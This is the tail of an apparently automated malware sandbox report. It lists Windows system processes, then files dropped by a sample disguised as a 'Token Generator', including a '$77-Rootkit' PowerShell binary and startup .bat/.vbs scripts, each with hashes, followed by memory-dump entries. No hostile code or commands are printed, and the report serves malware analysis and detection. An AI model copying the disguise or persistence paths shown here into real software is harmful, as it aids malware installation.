                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                1⤵
                                                                                                                  PID:4392
                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                  1⤵
                                                                                                                    PID:5076
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                    1⤵
                                                                                                                      PID:640
                                                                                                                    • C:\Windows\System32\mousocoreworker.exe
                                                                                                                      C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                      • Checks processor information in registry
                                                                                                                      • Enumerates system info in registry
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      PID:3352
                                                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                      1⤵
                                                                                                                        PID:868
                                                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                        1⤵
                                                                                                                          PID:3252
                                                                                                                        • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                          "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                          1⤵
                                                                                                                            PID:4120

                                                                                                                          Network

                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                          Replay Monitor

                                                                                                                          Loading Replay Monitor...

                                                                                                                          Downloads

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                            Filesize

                                                                                                                            3KB

                                                                                                                            MD5

                                                                                                                            6b8559593a74eb3b15c53a9fac9a469f

                                                                                                                            SHA1

                                                                                                                            13af213d1417edf30c03f76f9242c1975b2e4e74

                                                                                                                            SHA256

                                                                                                                            e053d1faabd6b36371f452e79cf70591cf45403a671746136a87198694a8fdb9

                                                                                                                            SHA512

                                                                                                                            699b11eda97866809b696c96304bc218d7b72623fd537f83721f36a6c617d854fda7b6f01f7cb0bc0d55189c386e9b9fe6d111bb7c76cce492572b0a9961e974

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                            Filesize

                                                                                                                            1KB

                                                                                                                            MD5

                                                                                                                            f8d49a4af7a844bfc7247d5670def557

                                                                                                                            SHA1

                                                                                                                            26ae0ce194a77a7a1887cf93741293fdfa6c94c4

                                                                                                                            SHA256

                                                                                                                            61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b

                                                                                                                            SHA512

                                                                                                                            9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                                                            Filesize

                                                                                                                            163KB

                                                                                                                            MD5

                                                                                                                            b51552b77057c2405f73bbbf9c89234a

                                                                                                                            SHA1

                                                                                                                            4793adbba023f90d2d2ad0ec55199c56de815224

                                                                                                                            SHA256

                                                                                                                            720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0

                                                                                                                            SHA512

                                                                                                                            564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Token Generator.exe
                                                                                                                            Filesize

                                                                                                                            3.1MB

                                                                                                                            MD5

                                                                                                                            6d2ad4ada4961027832e557db06fc08d

                                                                                                                            SHA1

                                                                                                                            816018499f5e291850d7dd2a0d15c914e5607630

                                                                                                                            SHA256

                                                                                                                            139ce0f6ed1d745a6776f831c641b2b30bb8d48ecd9c198a0b4bd8489899f60e

                                                                                                                            SHA512

                                                                                                                            1d99985c99fa16f712eee5604279463e18e77532e7a1586651178685ef38ba25b099c393edc44f2703d7e9f4ce7596b86ba3d9f0e00119e13474816a2186f241

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jxwvqw4v.hi5.ps1
                                                                                                                            Filesize

                                                                                                                            60B

                                                                                                                            MD5

                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                            SHA1

                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                            SHA256

                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                            SHA512

                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                          • C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe
                                                                                                                            Filesize

                                                                                                                            442KB

                                                                                                                            MD5

                                                                                                                            04029e121a0cfa5991749937dd22a1d9

                                                                                                                            SHA1

                                                                                                                            f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                            SHA256

                                                                                                                            9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                            SHA512

                                                                                                                            6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                          • C:\Users\Admin\AppData\Roaming\startup_str_474.bat
                                                                                                                            Filesize

                                                                                                                            3.5MB

                                                                                                                            MD5

                                                                                                                            e984ebea899379a8c0a47f9308c7370b

                                                                                                                            SHA1

                                                                                                                            863330006bef4c55a1bc79771ae989dc0412f717

                                                                                                                            SHA256

                                                                                                                            9f413ae8218ec74eb61a052e1c2b8b27f8ee7038902db5aaea9c93e0752fa48b

                                                                                                                            SHA512

                                                                                                                            70934def86e93b350e72711e757cbe0a97a9a58259f184e2c97aeea3a2b9f016bb03e4fb499f3876248bfb43edec5e3949599448d95235afcb1b46d71362b975

                                                                                                                          • C:\Users\Admin\AppData\Roaming\startup_str_474.vbs
                                                                                                                            Filesize

                                                                                                                            115B

                                                                                                                            MD5

                                                                                                                            3f461d8448675892627b9df16e70e8d1

                                                                                                                            SHA1

                                                                                                                            1fcf77898cde1cd37f1fd0358c41f556335ca7f5

                                                                                                                            SHA256

                                                                                                                            5e08ddd3d0b9d89d6f7c22c7ead149ca78d5e82efd8845d0a1e345da425735f8

                                                                                                                            SHA512

                                                                                                                            3cf7e5b574b10d7dd1fb228d62988ba085110524f414cb5e72b87b1620ac2367262aba1c99e925a7a00cb5894c47681cc1f5c9f4b19477f027f19914cafea4f8

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                            SHA1

                                                                                                                            98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                            SHA256

                                                                                                                            ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                            SHA512

                                                                                                                            c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            f313c5b4f95605026428425586317353

                                                                                                                            SHA1

                                                                                                                            06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                            SHA256

                                                                                                                            129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                            SHA512

                                                                                                                            b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                            SHA1

                                                                                                                            a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                            SHA256

                                                                                                                            98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                            SHA512

                                                                                                                            1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                            SHA1

                                                                                                                            63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                            SHA256

                                                                                                                            727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                            SHA512

                                                                                                                            f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                            SHA1

                                                                                                                            5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                            SHA256

                                                                                                                            55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                            SHA512

                                                                                                                            5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            0b990e24f1e839462c0ac35fef1d119e

                                                                                                                            SHA1

                                                                                                                            9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                            SHA256

                                                                                                                            a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                            SHA512

                                                                                                                            c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                          • memory/316-145-0x00007FF7F44B0000-0x00007FF7F44C0000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/316-144-0x00000267191E0000-0x000002671920A000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/316-139-0x00000267191E0000-0x000002671920A000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/612-114-0x000001DE71FB0000-0x000001DE71FDA000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/612-115-0x00007FF7F44B0000-0x00007FF7F44C0000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/612-107-0x000001DE71F80000-0x000001DE71FA5000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            148KB

                                                                                                                          • memory/612-109-0x000001DE71FB0000-0x000001DE71FDA000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/612-108-0x000001DE71FB0000-0x000001DE71FDA000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/676-124-0x0000027990830000-0x000002799085A000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/676-119-0x0000027990830000-0x000002799085A000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/676-125-0x00007FF7F44B0000-0x00007FF7F44C0000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/736-149-0x000001B62D970000-0x000001B62D99A000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/736-154-0x000001B62D970000-0x000001B62D99A000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/736-155-0x00007FF7F44B0000-0x00007FF7F44C0000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/956-134-0x00000194289D0000-0x00000194289FA000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/956-129-0x00000194289D0000-0x00000194289FA000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/956-135-0x00007FF7F44B0000-0x00007FF7F44C0000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/1656-95-0x00007FF833180000-0x00007FF83323E000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            760KB

                                                                                                                          • memory/1656-93-0x0000023D2CAE0000-0x0000023D2CB0A000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/1656-94-0x00007FF834430000-0x00007FF834625000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            2.0MB

                                                                                                                          • memory/3036-91-0x0000000002B00000-0x0000000002B50000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            320KB

                                                                                                                          • memory/3036-92-0x000000001BD80000-0x000000001BE32000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            712KB

                                                                                                                          • memory/3792-54-0x000001EB41380000-0x000001EB416A4000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            3.1MB

                                                                                                                          • memory/4284-99-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4284-96-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4284-98-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4284-101-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4284-103-0x00007FF833180000-0x00007FF83323E000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            760KB

                                                                                                                          • memory/4284-97-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4284-102-0x00007FF834430000-0x00007FF834625000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            2.0MB

                                                                                                                          • memory/4284-104-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4588-0-0x00007FF8161C3000-0x00007FF8161C5000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            8KB

                                                                                                                          • memory/4588-49-0x00007FF8161C0000-0x00007FF816C81000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/4588-14-0x000001A8F91D0000-0x000001A8F966E000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4.6MB

                                                                                                                          • memory/4588-13-0x000001A8F4AC0000-0x000001A8F4AC8000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4588-12-0x00007FF8161C0000-0x00007FF816C81000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/4588-11-0x00007FF8161C0000-0x00007FF816C81000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/4588-1-0x000001A8F8C40000-0x000001A8F8C62000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            136KB

                                                                                                                          • memory/4700-72-0x0000000000DA0000-0x00000000010C4000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            3.1MB

                                                                                                                          • memory/4908-30-0x00007FF8161C0000-0x00007FF816C81000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/4908-27-0x00007FF8161C0000-0x00007FF816C81000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/4908-26-0x00007FF8161C0000-0x00007FF816C81000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/4908-25-0x00007FF8161C0000-0x00007FF816C81000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            10.8MB